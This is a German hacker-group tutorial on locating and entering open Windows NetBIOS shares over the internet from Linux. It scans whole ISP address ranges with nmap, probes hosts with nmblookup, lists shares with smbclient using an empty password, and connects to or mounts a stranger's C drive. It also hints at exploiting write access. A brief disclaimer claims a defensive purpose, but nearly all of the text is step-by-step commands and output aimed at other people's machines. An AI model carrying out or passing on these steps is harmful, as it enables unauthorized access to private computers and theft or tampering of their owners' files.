############################################# ][ ][ ][ Aufspüren von NetBios Freigaben (Linux) ][ ][ ][ ############################################# Viele Leute geben den Inhalt ihrer gesamten Festplatte frei, im Glauben, dass dies sicher sei oder einfach, weil sie sich den Sicherheitsrisiken nicht bewusst sind. Es ist zwar sehr bequem vom PC im eigenen Netzwerk auf die Festplatte des anderen PCs zuzugreifen, jedoch bringt es nicht nur Vorteile. Denn auch den Usern des Internets steht der Weg zur eigenen Festplatte somit offen. Im nun folgenden Text möchte ich darlegen wie diese Sicherheitslücke unter Linux ausgenutzt werden kann, mit dem Ziel sich somit gegen diese Art von Angriffe effektiv verteidigen zu können. Es soll auf die Gefahr der NetBios Freigabe aufmerksam gemacht werden und darf nicht zu kriminellen Straftaten missbraucht werden. Um einen anfälligen PC auszumachen verwendet ihr am besten nmap zum scannen. mit dem Befehl nmap -sS -p 139 für gebt ihr die IP ein, wie z.B. 200.200.200.200 oder um eine ganze reihe zu scannen 200.200.200.* erkundigt euch besser vorher welche Ip-ranges welchem Provider gehören, so dass ihr gezielter scannen könnt. Ihr solltet ein ähnliches Ergebnis wie dieses erhalten: ---------------- nmap -sS -p 139 80.133.251.* Starting nmap V. 3.00 ( www.insecure.org/nmap/ ) ... Starting nmap V. 3.00 ( www.insecure.org/nmap/ ) Interesting ports on p5085FB01.dip.t-dialin.net (80.133.251.x): Port State Service 139/tcp filtered netbios-ssn ... Interesting ports on p5085FB3C.dip.t-dialin.net (80.133.251.xx): Port State Service 139/tcp open netbios-ssn ... The 1 scanned port on p5085FB05.dip.t-dialin.net (80.133.251.xxx) is: closed ... ---------------- Interesting ports on p5085FB3C.dip.t-dialin.net (80.133.251.xx): Port State Service 139/tcp open netbios-ssn der hier wäre interessant, also weiter. Mit nmblookup -A könnt ihr eventuelle Freigaben betrachten, hier kommt öfters mal überhaupt kein Ergebnis, oder nicht das Gewünschte. Oft hilft nur langes probieren und viel Geduld. Ich hab hier natürlich gleich ein Bsp. bei dem alles klappt: --------------------- nmblookup -A 80.133.251.xx Looking up status of 80.133.251.xx PRIVAT <00> - B PRIVAT <20> - B MSHEIMNETZ <00> - B MSHEIMNETZ <1e> - B --------------------- PRIVAT <20> - B die <20> ist für uns interessant. Falls diese nicht vorhanden ist, gleich das nächste Ziel testen. Mit dem diesem Befehl können wir uns die Freigaben ansehen: smbclient -L -I Es erfolgt eine Passwortabfrage, bestätigt diese einfach mit Enter. Nach meiner Erfahrung haben 90% hier kein Passwort angegeben. Bei unserer Testperson erhalten wir folgendes Ergebnis: -------------------- smbclient -L PRIVAT -I 80.133.251.xx added interface ip=192.168.0.1 bcast=192.168.0.255 nmask=255.255.255.0 Password: Domain=[MSHEIMNETZ] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager] Sharename Type Comment --------- ---- ------- E$ Disk Standardfreigabe IPC$ IPC Remote-IPC D$ Disk Standardfreigabe print$ Disk Druckertreiber C Disk K$ Disk Standardfreigabe F$ Disk Standardfreigabe ADMIN$ Disk Remoteadmin Drucker Printer HP DeskJet 950C/952C/959C C$ Disk Standardfreigabe Server Comment --------- ------- Workgroup Master --------- ------- ----------------- C hört sich hier interessant an, mal sehen was wir hier so finden. Das ganze machen wir mit: smbclient //DESKTOP-XP/C -I 80.133.251.xx ------------------ smbclient //DESKTOP-XP/C -I 80.133.251.xx added interface ip=192.168.0.1 bcast=192.168.0.255 nmask=255.255.255.0 Password: Domain=[MSHEIMNETZ] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager] smb: \> ------------------ Ok, das wars, wir sind drauf. Hier könnt ihr mit ganz normalen DOS befehlen arbeiten, also "cd" und "cd.." zum Verzeichniswechsel, "dir" um den Inhalt des Verzeichnisses ausgeben zu lassen usw. ihr solltet gleich mal testen ob ihr auch Schreibzugriff habt, dann lässt sich noch weitaus mehr machen ;) Tips, Tricks, Sonstiges: Ihr könnt diese Freigabe auch einfach mounten, erstellt einen Ordner in /mnt/ z.B. das Verzeichniss Freigabe und dann gebt ein smbmount //NetBiosName/C /mnt/Freigabe -o ip= Ein Tool, das wesentlich schneller scannt als Nmap ist nbtscan, allerdings kommen mir die Ergebnisse etwas mager vor. #~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~# $ $ # Geschrieben von: DrWhiteLetter (DrWhiteLetter@login-club.org) # $ $ # Überarbeitet von: Ph4sm4 (Ph4sm4@login-club.org) # $ $ # http://www.login-club.org | irc.euric.net 6667 #loginclub # $ $ # __ _ ________ __ # $ / / ___ ___ (_)___ / ____/ /_ __/ /_ $ # / / / __ \/ __ \/ / __ \/ / / / / / / __ \ # $ / /__/ /_/ / /_/ / / / / / /___/ / /_/ / /_/ / $ # /____/\____/\__ /_/_/ /_/\____/_/\____/_____/ # $ / /_/ / $ # \____/ # $ $ #~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#